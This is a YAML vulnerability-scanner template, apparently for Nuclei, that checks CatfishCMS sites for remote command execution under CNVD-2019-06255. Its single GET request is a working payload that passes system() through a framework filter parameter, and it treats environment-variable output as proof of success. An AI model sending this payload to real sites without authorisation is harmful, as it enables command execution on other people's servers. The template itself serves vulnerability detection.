28 lines
646 B
YAML
28 lines
646 B
YAML
id: CNVD-2019-06255
|
|
|
|
info:
|
|
name: CatfishCMS RCE
|
|
author: Lark-Lab
|
|
severity: medium
|
|
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
|
|
tags: rce,cnvd,catfishcms,cnvd2019
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- 'OS'
|
|
- 'PATH'
|
|
- 'SHELL'
|
|
- 'USER'
|
|
condition: and
|